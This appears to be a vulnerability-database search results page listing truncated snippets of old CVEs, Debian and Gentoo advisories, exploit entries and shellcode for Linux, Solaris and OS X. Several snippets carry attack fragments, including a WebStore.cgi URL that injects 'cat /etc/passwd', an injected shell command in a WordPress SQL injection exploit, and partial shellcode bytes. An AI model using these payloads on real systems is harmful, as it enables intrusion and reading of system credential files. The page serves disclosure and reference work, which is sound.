1849 matches found
CVE-2005-1851
A certain contributed script for ekg Gadu Gadu client 1.5 and earlier allows attackers to execute shell commands via unknown attack vectors...
Debian DSA-762-1 : affix - several vulnerabilities
Kevin Finisterre discovered two problems in the Bluetooth FTP client from affix, user space utilities for the Affix Bluetooth protocol stack. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities : - CAN-2005-2250 A buffer overflow allows remote attackers to...
CVE-2004-2183
Unknown vulnerability in WeHelpBUS 0.1 allows remote attackers to execute arbitrary shell commands via the query string...
[Full-disclosure] Advisory 05/2005: Cacti Authentification/Addslashes Bypass Vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hardened - PHP Project www.hardened-php.net -= Security Advisory =- Advisory: Cacti Authentification/Addslashes Bypass Vulnerability Release Date: 2005/07/01 Last Modified: 2005/07/01 Author: Stefan Esser [email protected] Application: Cacti =...
Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit
Exploit for unknown platform in category web applications =========================================================== Wordpress wp.pl http://pathto/wp admin 1 "id;uname -a;pwd;uptime" Trying Host http://pathto/wp ... + The XMLRPC server seems to be working + Char 1 is 2 + Char 2 is 1 + Cha...
GLSA-200506-13 : webapp-config: Insecure temporary file handling
The remote host is affected by the vulnerability described in GLSA-200506-13 webapp-config: Insecure temporary file handling Eric Romang discovered webapp-config uses a predictable temporary filename while processing certain options, resulting in a race condition. Impact : Successful exploitation...
webapp-config: Insecure temporary file handling
Background webapp-config is a Gentoo Linux utility to help manage the installation of web-based applications. Description Eric Romang discovered webapp-config uses a predictable temporary filename while processing certain options, resulting in a race condition. Impact Successful exploitation of t...
GForge 3.x - Arbitrary Command Execution
GForge 3.x - Arbitrary Command Execution source: https://www.securityfocus.com/bid/13716/info GForge is affected by a remote command execution vulnerability. This issue arises because the application fails to sanitize user-supplied data passed through URI parameters. An attacker can supply...
GForge 3.x - Arbitrary Command Execution
source: https://www.securityfocus.com/bid/13716/info GForge is affected by a remote command execution vulnerability. This issue arises because the application fails to sanitize user-supplied data passed through URI parameters. An attacker can supply arbitrary shell commands through the affected...
[SA15054] WebAPP E-Cart Module Shell Command Injection Vulnerability
---------------------------------------------------------------------- Want a new IT Security job? Vacant positions at Secunia: http://secunia.com/secuniavacancies/ ---------------------------------------------------------------------- TITLE: WebAPP E-Cart Module Shell Command Injection...
CVE-2004-2183
Unknown vulnerability in WeHelpBUS 0.1 allows remote attackers to execute arbitrary shell commands via the query string...
linux/x86 Radically Self Modifying Code 70 bytes
No description provided by source. /-------------------------------------------------------/ / Radically Self Modifying Code for surviving / / toupper and tolower / / / / 70byte execve & exit code by XORt / /-------------------------------------------------------/ "\xeb\x12" / jmp $0x12 / "\x5e" ...
linux/x86 execve code 23 bytes
Exploit for linux/x86 platform in category shellcode ============================== linux/x86 execve code 23 bytes ============================== / Linux 23 byte execve code. Greetz to preedator marcetam admin at marcetam.net / char linux= "\x99" / cdq / "\x52" / push %edx / "\x68\x2f\x2f\x73\x68...
[Full-Disclosure] TWiki search function allows arbitrary shell command execution
VULNERABLE SOFTWARE VERSIONS TWiki http://twiki.org/ - TWiki 20030201 e.g. Debian Sarge - probably later versions - Subversion repository at http://ntwiki.ethermage.net:8181/svn/twiki/trunk at least until revision 3224 including ATTACK VECTORS HTTP GET requests towards the Wiki server typically...
Debian DSA-229-1 : imp - SQL injection
Jouko Pynnonen discovered a problem with IMP, a web-based IMAP mail program. Using carefully crafted URLs a remote attacker is able to inject SQL code into SQL queries without proper user authentication. Even though results of SQL queries aren't directly readable from the screen, an attacker migh...
solaris/x86 add services and execve inetd 201 bytes
Exploit for solaris/x86 platform in category shellcode =================================================== solaris/x86 add services and execve inetd 201 bytes =================================================== / Solaris/x86 Just execve's the following: "echo "ingreslock stream tcp nowait root...
os-x/PPC Add user r00t 219 bytes
os-x/PPC Add user r00t 219 bytes. Shellcode exploit for osxppc platform / PPC OS X / Darwin Shellcode by B-r00t. 2003. open; write; close; execve; exit; See ASM below. 219 Bytes! / char shellcode = "\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x48\x02\xa6\x3b\xea\x01\x70"...
Web_Store.cgi allows Command Execution
WebStore.cgi allows Command Execution: This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands: http://www.victim.com/cgi-bin/webstore.cgi?page=.html|cat /etc/passwd| Zero X, member of www.Lobnan.de and www.Lostkey.org...
webstoreExec.txt
WebStore.cgi allows Command Execution: This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands: http://www.victim.com/cgi-bin/webstore.cgi?page=.html|cat /etc/passwd| Zero X, member of www.Lobnan.de and www.Lostkey.org...
Microsoft Internet Explorer - Remote Application.Shell
Microsoft Internet Explorer - Remote Application.Shell function InjectedDuringRedirection showModalDialog'md.htm',window,"dialogTop:-10000;dialogLeft:-10000;dialogHeight:1; dialogWidth:1;".location="vbscript:"""; setTimeout"myiframe.execScriptInjectedDuringRedirection.toString",100;...